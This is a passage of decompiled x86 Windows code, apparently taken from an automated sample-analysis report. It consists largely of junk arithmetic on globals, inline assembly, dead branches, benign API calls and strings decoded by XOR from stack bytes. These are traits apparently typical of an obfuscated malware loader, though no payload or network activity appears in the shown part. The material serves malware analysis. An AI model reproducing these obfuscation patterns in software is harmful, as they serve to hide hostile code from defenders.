							__eflags =  *0x1000cd8; // 0x6dc8
							if(__eflags != 0) {
								__eflags =  *(_t2587 - 2);
								if( *(_t2587 - 2) == 0) {
									 *(_t2587 - 0x5c) =  *(_t2587 - 0x5c) >>  *0x10ae584;
									 *0x1000ca8 =  *0x1000ca8 + 1;
									asm("adc [0x1000cac], edx");
									__eflags =  *(_t2587 - 0x40) |  *(_t2587 - 0x3c);
									if(( *(_t2587 - 0x40) |  *(_t2587 - 0x3c)) != 0) {
										_t1588 = 0;
										__eflags = 0;
									} else {
										_t1588 = 1;
									}
									_t2488 = (( *(_t2587 - 0xe) & 0x000000ff) + ( *(_t2587 - 5) & 0x000000ff)) * (( *0x1000c83 & 0x000000ff) -  *0x1000cd8) * (( *0x1000ce8 & 0x0000ffff) + _t1588 + 0x514aab80);
									__eflags = _t2488;
									 *(_t2587 - 0x4c) = _t2488;
								}
							}
						} else {
							 *(_t2587 - 0xbc) = 0;
							 *(_t2587 - 0xac) =  !( *(_t2587 - 3) & 0x000000ff) -  *0x1000d00 & 0x0000ffff;
							 *0x1000d20 =  *(_t2587 - 0xf) +  *(_t2587 - 0x78) &  *(_t2587 - 0xac);
							if( *(_t2587 - 0x2c) != 0) {
								_t1595 = 0;
								__eflags = 0;
							} else {
								_t1595 = 1;
							}
							 *(_t2587 - 4) =  *(_t2587 - 0x40) + _t1595;
							_t2491 =  *(_t2587 - 0xc);
							_t2079 =  *0x1000cf4; // 0x2b91c
							_t2080 =  *0x1000cf0; // 0xd43579fe
							asm("sbb eax, eax");
							 *(_t2587 - 0x70) =  ~(_t2491 & 0x000000ff ^ M01000CB0) + 1;
							asm("cdq");
							 *0x1000d18 = E00ECEE50( *0x1000c83 & 0x000000ff, _t2491, _t2080, _t2079);
							_t1602 =  *0x1000c88; // 0xa666078f
							 *0x1000d1c = _t2491;
							 *(_t2587 - 0x88) =  *(_t2587 - 0x88) + _t1602 + 0xbe075b36;
						}
					}
					_t2161 =  *(_t2587 - 0x20);
					 *((short*)(_t2587 + _t2516 * 2 - 0x150)) = ( *(_t2587 - 0x20) +  *(_t2587 - 0xb4)) * _t2161 * 0x3a4 + (_t1636 & 0x000000ff) + 0x7180;
					_t2516 = _t2516 + 1;
				} while (_t2516 < 3);
				_t1064 = E00EC1700();
				asm("cdq");
				 *0x1000ca8 = _t1064;
				 *0x1000cac = _t2161;
				if((_t1064 | _t2161) == 0 || _t1064 != 5 || _t2161 != 0) {
					_t2161 =  *(_t2587 - 0x60);
					if(_t2161 >  !( *(_t2587 - 0x88))) {
						_t2059 =  *0x1000d00; // 0xfffff835
						asm("cdq");
						_t1574 =  *0x1000d04; // 0xffffffff
						asm("sbb edi, edx");
						 *0x1000d04 = _t1574 | _t1574;
						 *0x1000d00 = _t2059 | _t2059 -  *(_t2587 - 7);
						if(( *(_t2587 - 0x78) ^  *0x1000c88 |  *(_t2587 - 0x74) ^  *0x1000c8c) != 0) {
							_t1579 = 0;
							__eflags = 0;
						} else {
							_t1579 = 1;
						}
						 *0x1000d20 =  !( !( *(_t2587 - 8) & 0x000000ff) * _t1579) + ( *(_t2587 - 3) & 0x000000ff);
						 *(_t2587 - 0x7c) =  *(_t2587 - 0x7c) - ( *(_t2587 - 0x7c) &  *0x1000c9a);
						_t1582 =  *0x1000cc0; // 0xffff970a
						_t2065 =  *0x1000cc4; // 0xffffffff
						_t2161 =  *0x1215420;
						 *(_t2587 - 0x40) = _t1582 + 0xffffff1b;
						asm("adc ecx, 0xffffffff");
						 *(_t2587 - 0x3c) = _t2065;
						 *(_t2587 - 0x68) = _t2161;
						 *(_t2587 - 0x64) = 0;
					}
				}
				 *((short*)(_t2587 - 0x14a)) = 0;
				_t1067 = E00EC1700();
				asm("cdq");
				 *(_t2587 - 0x68) = _t1067;
				 *(_t2587 - 0x64) = _t2161;
				if(( *(_t2587 - 0x68) |  *(_t2587 - 0x64)) == 0) {
					 *(_t2587 - 4) = ( *(_t2587 - 9) & 0x000000ff) + 0x26268ad6;
					_t2475 =  *(_t2587 - 0x80);
					asm("cdq");
					 *0x1000ca8 =  *0x1000ca8 + E00ECEE50(_t2475 & 0x0000ffff, _t2475, 0xb4ace0f7, 0x43a22);
					_t1571 = M01000CB0; // 0x0
					asm("adc [0x1000cac], edx");
					 *0x11302b8 = _t1571;
					asm("cdq");
					 *0x1000cbc = _t2475;
					_t2476 =  *0x1000ce8; // 0x4
					 *0x1000cb8 =  *0x1000c9b & 0x000000ff;
					 *(_t2587 - 0xd) = ( *(_t2587 - 0xd) & 0x000000ff) + _t2476;
				}
				asm("sbb eax, eax");
				_t2162 =  *(_t2587 - 9);
				if( ~( *0x1000c9b & 0x000000ff) == _t2162) {
					__eflags =  *(_t2587 - 4) - 0x27dc2ea9;
					if( *(_t2587 - 4) > 0x27dc2ea9) {
						 *(_t2587 - 0xe) = ( *0x1000cec & 0x0000ffff) - ( *(_t2587 - 0xe) == 0);
						_t2167 =  *(_t2587 - 8) & 0x000000ff;
						__eflags = ( *0x1000cec & 0x0000ffff) - ( *(_t2587 - 0xe) == 0) > 0 - _t2167;
						if(( *0x1000cec & 0x0000ffff) - ( *(_t2587 - 0xe) == 0) > 0 == _t2167) {
							__eflags =  *(_t2587 - 0xa);
							if( *(_t2587 - 0xa) != 0) {
								 *(_t2587 - 0xc) =  *0x1215420 & 0x000000ff;
								__eflags =  *(_t2587 - 1) & 0x000000ff;
								 *(_t2587 - 7) =  !(((0 | ( *(_t2587 - 1) & 0x000000ff) == 0x00000000) + ( *(_t2587 - 0x1c) & 0x0000ffff)) * ( *(_t2587 - 8) & 0x000000ff)) - ( *(_t2587 - 3) & 0x000000ff) -  *(_t2587 - 0x6c) + ( *(_t2587 - 0x5c) & 0x0000ffff);
								asm("cdq");
								 *(_t2587 - 0x58) =  *(_t2587 - 0x58) - ( *0x1000cec & 0x0000ffff);
								asm("sbb [ebp-0x54], edx");
							}
						} else {
							_t1562 =  *(_t2587 - 0x5c) +  *0x1000cc0 + 0x43;
							 *0x1000c9e = _t1562;
							asm("cdq");
							 *(_t2587 - 2) =  *0x1000c9f >> 7;
							 *0x1000d00 = _t1562;
							 *0x1000d04 = _t2167;
						}
					} else {
						 *0x1000c9b =  *(_t2587 - 0x5c) >> 1;
						 *0x1000c94 =  *0x10bd9dc;
					}
				} else {
					_t1567 = E00EC1000();
					asm("cdq");
					 *0x1000c88 = _t1567 & 0x000000ff;
					 *0x1000c8c = _t2162;
				}
				_t2169 = _t2587 - 0x150;
				FoldStringW(0x80, _t2169, 2, _t2587 - 0xa10, 0x400);
				_t1078 =  *0x1000c94; // 0x0
				asm("sbb edx, edx");
				asm("sbb eax, eax");
				if( ~_t2169 ==  ~_t1078) {
					__eflags =  *0x1000c9f;
					if( *0x1000c9f != 0) {
						_t2463 =  *(_t2587 - 0xc);
						_t1544 =  *(_t2587 - 0xd) + (_t2463 & 0x000000ff);
						__eflags = _t1544;
						asm("cdq");
						 *0x1000d00 = _t1544;
						 *0x1000d04 = _t2463; // executed
					}
					goto L80;
				} else {
					_t1546 = E00EC1190() & 0x000000ff;
					 *0x1000cd4 = _t1546;
					if(_t1546 <= 0) {
						L80:
						__imp__CoUninitialize(); // executed
					} else {
						 *0x1000cf0 =  *0x1000cf0 +  *(_t2587 - 0x70) * 0xfa62;
						_t2465 =  *0x1000ce8 & 0x0000ffff;
						asm("adc dword [0x1000cf4], 0x0");
						asm("cdq");
						asm("cdq");
						asm("adc edx, ebx");
						 *0x1000cb8 =  *(_t2587 - 0x5c) +  *(_t2587 - 0xa0) ^  *(_t2587 - 0x24) * _t2465;
						 *0x1000cbc = _t2465 ^ _t2465;
						__imp__CoUninitialize();
					}
				}
				_t1637 = 0;
				_t1724 =  *0x1000cc0; // 0x970a
				 *0x1000ca0 =  *0x1000ca0 + 1;
				 *0x1000c98 = 4;
				_t1082 =  *0x1000c98 & 0x0000ffff;
				 *0x1000d20 = _t1724;
				 *(_t2587 - 0xe) = ( *(_t2587 - 0xe) & 0x000000ff) -  *0x10ae260;
				if(_t1082 <= 4) {
					switch( *((intOrPtr*)(_t1082 * 4 +  &M00EC7898))) {
						case 0:
							 *(_t2587 - 0x30) =  *(_t2587 - 0x30) +  *0x1000d10;
							 *0x1000cb4 = ( *(_t2587 - 0x18) & 0x0000ffff) * 0x4c87d2ee;
							goto L92;
						case 1:
							 *0x1000c9f =  *0x1000c9f + 0x91;
							__eax = __eax | 0xffffffff;
							 *0x1000ca0 =  *0x1000c9f + 0x91;
							 *((intOrPtr*)(__ebp - 0x68)) =  *((intOrPtr*)(__ebp - 0x68)) + __eax;
							asm("adc [ebp-0x64], eax");
							__edx =  *(__ebp - 0x70);
							__ecx =  *(__ebp - 0x48);
							__esi =  *(__ebp - 0x44);
							__eax = 0;
							__edx =  *(__ebp - 0x70) +  *(__ebp - 0x48);
							 *(__ebp - 0x48) =  *(__ebp - 0x70) +  *(__ebp - 0x48);
							asm("adc eax, esi");
							 *(__ebp - 0x44) = 0;
							 *(__ebp - 5) & 0x000000ff = ( *(__ebp - 5) & 0x000000ff) + 0x5c4b70c7;
							 *(__ebp - 6) = __dl;
							goto L92;
						case 2:
							 *0x1000cc0 =  *0x1000cc0 -  *0x1000d18;
							__edx =  *0x1000cc4; // 0xffffffff
							asm("sbb edx, [0x1000d1c]");
							__eax =  *(__ebp - 0x48);
							__esi =  *(__ebp - 0x44);
							__eax =  *(__ebp - 0x48) +  *0x1000cc0 -  *0x1000d18;
							asm("adc esi, edx");
							__eax =  *(__ebp - 0x48) +  *0x1000cc0 -  *0x1000d18 |  *(__ebp - 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__esi = 0;
								__eflags = 0;
							} else {
								_t282 = __eax + 1; // 0x4ab9e449
								__esi = _t282;
							}
							__eax =  *(__ebp - 1) & 0x000000ff;
							__ecx = __al;
							__edx = 0;
							0x671b87b8 = 0x671b87b8 - __al;
							__ecx =  *0x1000ca0; // 0x5247
							__eflags = __ecx - __ebx;
							__edx = 0 | __ecx == __ebx;
							(0x671b87b8 - __al) * __edx = (0x671b87b8 - __al) * __edx * __ecx;
							__eax = (0x671b87b8 - __al) * __edx * __ecx - __esi;
							asm("cdq");
							 *0x1000cc8 = (0x671b87b8 - __al) * __edx * __ecx - __esi;
							__eax =  *(__ebp - 0xa) & 0x000000ff;
							__ecx =  *(__ebp - 6) & 0x000000ff;
							__eax = ( *(__ebp - 0xa) & 0x000000ff) - 0x96;
							__eax = ( *(__ebp - 0xa) & 0x000000ff) - 0x00000096 |  *(__ebp - 6) & 0x000000ff;
							 *0x1000ccc = __edx;
							 *(__ebp - 6) = __al;
							__dl = 0xa6;
							__edx = __eax * 0xa6 >> 0x20;
							__eax = __eax * 0xa6;
							 *0x1000cd2 = __al;
							0xffffb1b4 = 0xffffb1b4 -  *0x1000ca8;
							__ecx = 0xffffffff;
							asm("sbb ecx, [0x1000cac]");
							 *((intOrPtr*)(__ebp - 0x58)) =  *((intOrPtr*)(__ebp - 0x58)) + 0xffffb1b4 -  *0x1000ca8;
							asm("adc [ebp-0x54], ecx");
							goto L92;
						case 3:
							__eax =  *0x1000d04;
							__ecx =  *0x1000d00; // 0xfffff835
							__ecx = E00ECEE50(__ecx,  *0x1000d04, 2, 0);
							__eax =  *0x1000c9f;
							__esi = __edx;
							asm("cdq");
							__ecx = __ecx +  *0x1000c9f;
							asm("adc esi, edx");
							__dl =  *(__ebp - 6);
							 *0x1000d00 = __ecx;
							__ecx = 0x188a;
							 *0x1000d04 = __edx;
							 *((short*)(__ebp - 0x80)) = (__dl & 0x000000ff) + __cx;
							goto L92;
						case 4:
							__edx =  *0x11fa040;
							 *((intOrPtr*)(__ebp - 0x2c)) =  *((intOrPtr*)(__ebp - 0x2c)) +  *0x11fa040;
							__eax =  *(__ebp - 2) & 0x000000ff;
							__cx = __al;
							__eax =  *0x1000d08 & 0x000000ff;
							__edx = 0x2243;
							__cx = __al + __dx;
							 *0x1000cf8 =  *0x1000cf8 + __cx;
							__edx = __eax *  *0x1000c9e >> 0x20;
							__eflags = __eax;
							 *0x1000c9e = __al;
							goto L92;
					}
				}
				L92:
				SetLastError(0x1d1c);
				_t2548 = 0;
				if(GetLastError() > 0) {
					do {
						 *0x1000cd4 = 1;
						 *(_t2587 - 4) =  *(_t2587 - 6) + 0x00000007 |  *(_t2587 - 4);
						 *(_t2587 - 0x84) = 0xb648;
						_t1513 =  *0x1000cd4; // 0x0
						_t1514 = _t1513 - M01000CB0;
						 *0x1000cd4 = _t1514;
						_t1516 = (_t1514 & 0x0000ffff) - _t1637;
						if(_t1516 == 0) {
							 *(_t2587 - 7) =  *(_t2587 - 7) & 0x000000e0;
							_t1518 =  *0x1000c9a & 0x000000ff;
							 *(_t2587 - 0x60) = _t1518 *  *0x1000c83 >> 0x20;
							_t2449 = ( *(_t2587 - 0x8c) & 0x0000ffff) * M01000CB0;
							__eflags = _t2449;
							 *0x1000c83 = _t1518 *  *0x1000c83;
							 *(_t2587 - 0x8c) = _t2449;
						} else {
							if(_t1516 == 1) {
								 *(_t2587 - 5) = ( *(_t2587 - 0xc) & 0x000000ff) - 0xb6;
								 *0x1135858 =  *(_t2587 - 0x7c);
								_t1538 =  *0x1000cc0; // 0xa
								 *(_t2587 - 0x90) =  *(_t2587 - 0x90) * ( *0x1000ce8 & 0x0000ffff) ^  *(_t2587 - 0x90);
								 *(_t2587 - 3) = _t1538 * 0xa1;
								asm("cdq");
								asm("sbb ebx, edx");
								 *(_t2587 - 0x68) =  *(_t2587 - 0x68) -  *0x1000c9f;
								_t1637 = 0;
							}
						}
						if(_t2548 > 0x19e) {
							 *0x1000d00 =  *0x1000d00 +  *(_t2587 - 0x40);
							_t2030 =  *0x1000d10; // 0x0
							asm("adc [0x1000d04], eax");
							 *(_t2587 - 0x2c) = _t2030 * 0xffff99cc;
							asm("cdq");
							 *(_t2587 - 0x68) =  *(_t2587 - 0x68) + E00ECEE50( *(_t2587 - 0x68),  *(_t2587 - 0x64),  *0x1000cd8,  *(_t2587 - 0x40));
							asm("adc [ebp-0x64], edx");
							_t1637 = 0;
							_t2649 =  *0x1000c94 - _t1637; // 0x0
							if(_t2649 == 0) {
								_t2033 =  *0x1000c88; // 0xa666078f
								__eflags = _t2033 |  *0x1000c8c;
								if((_t2033 |  *0x1000c8c) != 0) {
									_t2456 =  *(_t2587 - 0x28) + 0x65ae;
									 *(_t2587 - 0x1c) = _t2456;
									asm("cdq");
									 *0x1000d10 =  *(_t2587 - 0x8c) + 0x5d05665c;
									 *0x1000d14 = _t2456;
									asm("cdq");
									 *0x1000cb8 =  *0x1000cb8 +  *0x1000cd2;
									asm("adc [0x1000cbc], edx");
								}
							} else {
								_t1535 =  *0x1000d08; // 0xd72e
								 *(_t2587 - 8) = ( *(_t2587 - 8) & 0x000000ff) + _t1535;
							}
							SetLastError(_t1637);
						}
						_t1521 =  *0x1000c9a; // -110
						 *0x1000cd2 = _t1521 * 0xf;
						 *(_t2587 - 8) =  *(_t2587 - 0x48) * M01000CB0;
						_t1525 =  *0x1000c90; // 0x571c
						 *0x1000cd4 = _t1525;
						 *0x1000ce8 =  *(_t2587 - 0x48) +  *(_t2587 - 0x48) +  *(_t2587 - 0x48) +  *(_t2587 - 0x48);
						GetConsoleCP();
						_t2548 = _t2548 + 1;
					} while (_t2548 < GetLastError());
				}
				 *(_t2587 - 0x28) = 1;
				_t1725 =  *0x1000cd0; // 0x8e0000
				 *0x1000c9b =  *(_t2587 - 4) +  *0x1000cc8;
				 *(_t2587 - 0x30) = _t1725 & 0x00005d2e;
				_t1087 =  *(_t2587 - 0x28) - _t1637;
				if(_t1087 == 0) {
					_t1728 =  *(_t2587 - 0xe) +  *(_t2587 - 0x7c);
					__eflags = _t1728;
					 *(_t2587 - 0x7c) = _t1728;
					 *(_t2587 - 0x6c) = 0x9c643092;
				} else {
					if(_t1087 == 1) {
						_t2442 =  *0x1000cec; // 0x9b7c
						 *(_t2587 - 0xb) = _t2442 >> 7;
					}
				}
				_t1089 = HeapCreate(0x40000, _t1637, _t1637); // executed
				_t2549 = _t1089;
				_t1090 =  *(_t2587 - 0x48);
				 *0x1000c9e = 0xf8;
				if(_t2549 == _t1637) {
					_t2173 =  *(_t2587 - 0x44);
					__eflags =  *0x1000cdc - _t1090;
					if( *0x1000cdc == _t1090) {
						__eflags = 0 - _t2173;
						if(0 == _t2173) {
							_t2560 = 0x20a;
							do {
								 *0x1000cdc =  *0x1000cdc +  *0x112ebd0;
								asm("cdq");
								asm("adc ebx, edx");
								_t2242 =  *(_t2587 - 0x78);
								 *(_t2587 - 0x78) = E00ECEE50( *(_t2587 - 0x78) +  *0x1000d08,  *(_t2587 - 0x74), _t2242,  *(_t2587 - 0x74));
								 *(_t2587 - 0x74) = _t2242;
								_t2244 = ( *(_t2587 - 0xb) & 0x000000ff) - ( *(_t2587 - 0xc) & 0x000000ff) * 0x618d9f6;
								 *(_t2587 - 0xb) = _t2244;
								asm("cdq");
								 *0x1000cb8 = E00ECEE50(E00ECEE50( *0x1000d20, _t2244,  *0x1000cb8,  *0x1000cbc), _t2244, 0x3960af70, 0x99459);
								 *0x1000cbc = _t2244;
								 *(_t2587 - 0x6c) =  *(_t2587 - 0x6c) + 1;
								_t2560 = _t2560 - 1;
								__eflags = _t2560;
							} while (_t2560 > 0);
						}
					}
					 *(_t2587 - 0x30) = GetMessagePos();
					 *(_t2587 - 0x30) - 0x1d =  *(_t2587 - 0x30);
					__eflags = ( *(_t2587 - 0x30) != 0) - ( *(_t2587 - 0x30) != 0x1d);
					if(( *(_t2587 - 0x30) != 0) > ( *(_t2587 - 0x30) != 0x1d)) {
						_t1638 = 0;
						__eflags =  *0x1000c94;
						if( *0x1000c94 != 0) {
							 *(_t2587 - 0x70) = 0x69f4a17b;
						}
					} else {
						_t1638 = 0;
					}
					 *((char*)(_t2587 - 0xf0)) = 0x56;
					 *((char*)(_t2587 - 0xef)) = 0x7e;
					 *((char*)(_t2587 - 0xee)) = 0x76;
					 *((char*)(_t2587 - 0xed)) = 0x74;
					 *((char*)(_t2587 - 0xec)) = 0x69;
					 *((char*)(_t2587 - 0xeb)) = 0x62;
					 *((char*)(_t2587 - 0xea)) = 0x3b;
					 *((char*)(_t2587 - 0xe9)) = 0x7d;
					 *((char*)(_t2587 - 0xe8)) = 0x7a;
					 *((char*)(_t2587 - 0xe7)) = 0x6e;
					 *((char*)(_t2587 - 0xe6)) = 0x77;
					 *((char*)(_t2587 - 0xe5)) = 0x6f;
					_t2550 = 0;
					__eflags = 0;
					do {
						 *(_t2587 - 0x30) = E00EC1000() & 0x000000ff;
						__eflags =  *(_t2587 - 0x30);
						if( *(_t2587 - 0x30) == 0) {
							_t1096 =  *0x1000cdc;
							__eflags = _t1096 - 0x8362;
							if(_t1096 >= 0x8362) {
								__eflags =  *0x1000c9c - _t1638;
								__eflags = (0 |  *0x1000c9c == _t1638) - _t1096;
								if(__eflags == 0) {
									asm("sbb ecx, ecx");
									 *(_t2587 - 6) =  *(_t2587 - 8) & 0 | __eflags == 0x00000000;
									_t2182 =  *0x1000d08 * 0x4cbe9a17;
									__eflags = _t2182;
									 *0x1000cd2 =  *(_t2587 - 0x38) - 0x14;
									 *0x1000c84 = _t2182;
									 *(_t2587 - 0x2c) =  *0x1000ca0;
								}
							}
						} else {
							_t2183 = "d:\\th\\ds\\ext\\a"; // 0x745c3a64
							_t1198 = "h\\ds\\ext\\a"; // 0x73645c68
							_t1803 = "\\ext\\a"; // 0x7478655c
							 *(_t2587 - 0x174) = _t2183;
							_t2184 =  *0xfff31c; // 0x615c
							 *(_t2587 - 0x170) = _t1198;
							_t1199 =  *0xfff31e; // 0x0
							 *(_t2587 - 0x16c) = _t1803;
							 *((short*)(_t2587 - 0x168)) = _t2184;
							 *((char*)(_t2587 - 0x166)) = _t1199;
							 *(_t2587 - 0x165) = _t1638;
						}
						_t874 = _t2550 - 0xf0; // 0x56
						 *(_t2587 + _t2550 * 2 - 0x190) = ( *(_t2587 + _t874) ^ 0x0000001b) & 0x000000ff;
						_t2550 = _t2550 + 1;
						__eflags = _t2550 - 0xc;
					} while (_t2550 < 0xc);
					_t1097 =  *0x1000c88; // 0xa666078f
					__eflags = _t1097 -  *0x1000ca8; // 0x7b8b5249
					if(__eflags == 0) {
						_t1791 =  *0x1000c8c; // 0xfff500a5
						__eflags = _t1791 -  *0x1000cac; // 0x106b42
						if(__eflags == 0) {
							_t2238 =  *0x1000cf4; // 0x2b91c
							_t1181 =  *0x1000cf0; // 0xd43579fe
							_t1182 = E00ECEE50(_t1181, _t2238, 2, _t1638);
							_t1792 = M01000CB0; // 0x0
							asm("sbb edx, esi");
							 *0x1000cf0 = _t1182 - _t1792;
							 *0x1000cf4 = _t2238;
							 *(_t2587 - 0x80) =  *(_t2587 - 0xb) & 0x000000ff ^  *(_t2587 - 0x80) & 0x0000ffff;
							 *(_t2587 - 0x28) =  *(_t2587 - 0x28) -  *0x1000d10 -  *(_t2587 - 0x28);
							_t1190 =  *0x1000c9c +  *0x1000c9c;
							__eflags = _t1190;
							 *(_t2587 - 8) =  *(_t2587 - 0x6c) - 0x80;
							 *(_t2587 - 6) = _t1190;
						}
					}
					_t1098 =  *0x1000cc0; // 0xffff970a
					_t2186 =  *0x1000ca8; // 0x7b8b5249
					 *((short*)(_t2587 - 0x178)) =  *(_t2587 - 0x134) *  *(_t2587 - 0x130) ^ 0x0000b7f8;
					 *(_t2587 - 0x6c) = 0x5b39;
					 *(_t2587 - 0x24) = _t1098 * 0x1e80;
					 *(_t2587 - 0x6c) =  *0x1215420;
					 *(_t2587 - 0x8c) = _t2186 + 0x7606;
					_t2188 =  *(_t2587 - 2);
					 *0x1000c94 =  *(_t2587 - 9) - 0x74bb;
					_t2551 =  *(_t2587 - 0x44);
					asm("cdq");
					 *((char*)(_t2587 - 0xe4)) = 0x80;
					 *((char*)(_t2587 - 0xe3)) = 0x88;
					 *((char*)(_t2587 - 0xe2)) = 0x80;
					 *((char*)(_t2587 - 0xe1)) = 0x82;
					 *((char*)(_t2587 - 0xe0)) = 0x9f;
					 *((char*)(_t2587 - 0xdf)) = 0x94;
					__eflags = _t2188 -  *(_t2587 - 0x48);
					if(_t2188 !=  *(_t2587 - 0x48)) {
						L327:
						_t1102 = 1;
					} else {
						__eflags = _t2188 - _t2551;
						if(_t2188 == _t2551) {
							_t1102 = 0;
							__eflags = 0;
						} else {
							goto L327;
						}
					}
					_t2552 =  *0x1000cb8; // 0x4
					__eflags =  *(_t2587 - 2) - 0x64;
					_t2190 = 0 |  *(_t2587 - 2) != 0x00000064;
					__eflags = _t1102 - _t2190;
					if(_t1102 == _t2190) {
						_t1177 =  *0x1000c88; // 0xa666078f
						_t2190 =  *0x1000c8c; // 0xfff500a5
						 *0x1000cd8 = E00FFD310(_t1177, 7, _t2190);
						_t1179 =  *0x1000c90; // 0xffff571c
						asm("cdq");
						_t1790 = _t2552 - _t1179;
						__eflags = _t1790;
						_t1180 =  *0x1000cbc; // 0x0
						asm("sbb eax, edx");
						 *(_t2587 - 0x40) = _t1790;
						 *(_t2587 - 0x3c) = _t1180;
					}
					M01000CB0 = _t2552 * 0xfd8bdd23;
					_t2519 = 0;
					__eflags = 0;
					do {
						_t1104 = E00EC1700();
						asm("cdq");
						 *0x1000cc8 = _t1104;
						__eflags = _t1104 | _t2190;
						 *0x1000ccc = _t2190;
						if((_t1104 | _t2190) != 0) {
							__eflags =  *(_t2587 - 0x68) |  *(_t2587 - 0x64);
							if(( *(_t2587 - 0x68) |  *(_t2587 - 0x64)) != 0) {
								_t1108 = 0;
								__eflags = 0;
							} else {
								_t1108 = 1;
							}
							_t2193 = ( *(_t2587 - 5) & 0x000000ff) *  *(_t2587 - 0x28) * _t1108;
							__eflags = _t2193;
							 *(_t2587 - 0x58) = _t2193;
							 *(_t2587 - 0x54) = _t1638;
						} else {
							__eflags =  *(_t2587 - 0x40) |  *(_t2587 - 0x3c);
							if(( *(_t2587 - 0x40) |  *(_t2587 - 0x3c)) != 0) {
								_t1168 = 0;
								__eflags = 0;
							} else {
								_t1168 = 1;
							}
							_t2233 = (_t1168 << 4) - _t1168;
							__eflags = _t2233;
							if(_t2233 != 0) {
								L344:
								_t1169 = 1;
							} else {
								__eflags =  *(_t2587 - 0x18);
								if( *(_t2587 - 0x18) != 0) {
									goto L344;
								} else {
									_t2236 =  *0x1000ca0; // 0x5247
									asm("adc eax, [0x1000ce4]");
									_t2557 = M01000CB0; // 0x0
									_t2558 = _t2557 + _t2236;
									_t1787 =  !( *(_t2587 - 0x58) +  *0x1000ce0);
									__eflags = 0 -  !( *(_t2587 - 0x54));
									if(__eflags < 0) {
										goto L344;
									} else {
										if(__eflags > 0) {
											L343:
											_t1169 = 0;
										} else {
											__eflags = _t2558 - _t1787;
											if(_t2558 <= _t1787) {
												goto L344;
											} else {
												goto L343;
											}
										}
									}
								}
							}
							__eflags =  !_t1169;
							if( !_t1169 != 0) {
								 *(_t2587 - 0x1c) = ( *(_t2587 - 0x1c) & 0x0000ffff) - ( *(_t2587 - 0x1c) & 0x0000ffff) +  *(_t2587 - 0x4c);
								 *0x1000c9b =  *0x1215420;
							}
						}
						_t2190 =  *(_t2587 + _t2519 - 0xe4) ^ 0x000000cd;
						 *(_t2587 + _t2519 * 2 - 0x148) = _t2190 & 0x000000ff;
						_t2519 = _t2519 + 1;
						__eflags = _t2519 - 6;
					} while (_t2519 < 6);
					 *0x1000cd0 =  *0x1000cd0 + 1;
					 *(_t2587 - 0x4c) = 2;
					 *(_t2587 - 0x24) =  *0x1000c9a - 0x57;
					 *0x1000ca0 =  *0x1000ca0 &  *(_t2587 - 0x88) + 0x7d5b2049;
					_t1111 =  *(_t2587 - 0x4c) - _t1638;
					__eflags = _t1111;
					if(_t1111 == 0) {
						 *(_t2587 - 0x38) =  *(_t2587 - 0xf) - 0x399b134;
						 *(_t2587 - 0x34) = _t1638;
						 *0x1000d00 =  *0x1000c88;
						 *0x1000d04 =  *0x1000c8c;
						_t2200 =  *(_t2587 - 0x68) +  *(_t2587 - 0x40);
						asm("adc eax, esi");
						_t1115 = E00ECEE50(E00ECEE50(_t2200,  *(_t2587 - 0x64),  *0x1000d18,  *0x1000d1c), _t2200, 2, _t1638);
						__eflags = _t1115 | _t2200;
						if((_t1115 | _t2200) != 0) {
							_t1117 = 0;
							__eflags = 0;
						} else {
							_t1117 = 1;
						}
						 *(_t2587 - 6) =  *0x1000ce0 |  *0x1000ce4;
						 *0x1000cf8 =  !( *(_t2587 - 0x28) +  *0x1000cb4 + ((0 |  *(_t2587 - 6) == 0x00000000) +  *0x1000c9e & 0x0000ffff)) * _t1117;
						if(( *0x1000ce0 |  *0x1000ce4) != 0) {
							_t1120 = 0;
							__eflags = 0;
						} else {
							_t1120 = 1;
						}
						asm("sbb edx, edx");
						_t2211 =  ~(( *(_t2587 - 0xc) & 0x000000ff) + _t1120) + 1;
						_t1122 =  *0x1000cd0 * 0xda;
						__eflags = _t1122;
						M01000CB0 = _t2211;
						asm("cdq");
						 *(_t2587 - 0x58) = _t1122;
						 *(_t2587 - 0x54) = _t2211;
					} else {
						_t1161 = _t1111 - 1;
						__eflags = _t1161;
						if(_t1161 == 0) {
							 *0x1000c9b =  *0x1000d00;
						} else {
							__eflags = _t1161 == 1;
							if(_t1161 == 1) {
								 *0x1000ca0 = 0x737;
								 *(_t2587 - 0xe) =  !(( *(_t2587 - 0x5c) & 0x0000ffff) * ( *0x1000c9e + 1) + ( *(_t2587 - 0x2c) & 0x0000ffff));
							}
						}
					}
					_t2213 = 0x7bff - ( *(_t2587 - 0x138) ^ 0x0000030e |  *(_t2587 - 0xb8) * 0x000000a9);
					 *(_t2587 - 0x13c) = _t2213;
					_t1127 = E00EC1190();
					asm("cdq");
					 *0x1000d04 = _t2213;
					 *0x1000d00 = _t1127 & 0x000000ff;
					__eflags =  *(_t2587 - 9);
					if( *(_t2587 - 9) != 0) {
						L368:
						_t2215 =  *(_t2587 - 0x80);
						asm("cdq");
						__eflags = (_t2215 & 0x0000ffff) -  *0x1000c88;
						if((_t2215 & 0x0000ffff) !=  *0x1000c88) {
							L371:
							__eflags =  *(_t2587 - 0x80);
							if( *(_t2587 - 0x80) == 0) {
								asm("sbb eax, eax");
								__eflags =  ~( *(_t2587 - 0x4c)) + 1 -  *(_t2587 - 0x90);
								_t977 =  ~( *(_t2587 - 0x4c)) + 1 ==  *(_t2587 - 0x90);
								__eflags = _t977;
								if(_t977 == 0) {
									__eflags =  *0x1000ca4 -  *(_t2587 - 0x24);
									if( *0x1000ca4 >=  *(_t2587 - 0x24)) {
										asm("cdq");
										asm("sbb esi, edx");
										__eflags =  *(_t2587 - 0xa0) -  *0x1000c9c |  *(_t2587 - 0x9c);
										if(( *(_t2587 - 0xa0) -  *0x1000c9c |  *(_t2587 - 0x9c)) != 0) {
											 *0x1000ca4 = (( *(_t2587 - 0xe) & 0x000000ff) -  *0x1000cdc) * (( *(_t2587 - 0xf) & 0x000000ff) +  !( *0x1000cdc) - ( *(_t2587 - 0xc) & 0xff)) * (( *(_t2587 - 9) & 0x000000ff) +  *0x1000c90);
											asm("cdq");
											 *(_t2587 - 0x58) =  *(_t2587 - 0x58) + ( *0x1000c98 & 0x0000ffff);
											asm("adc [ebp-0x54], edx");
											_t1771 =  *(_t2587 - 0xe) & 0x000000ff ^ 0x000000fe;
											__eflags = _t1771;
											 *(_t2587 - 8) = _t1771;
										}
									}
								} else {
									 *0x1000c9a =  !( *0x1000c83);
									 *0x1000c9b =  *(_t2587 - 0x7c) + 0x30;
								}
							}
						} else {
							__eflags = _t2215 -  *0x1000c8c;
							if(_t2215 !=  *0x1000c8c) {
								goto L371;
							} else {
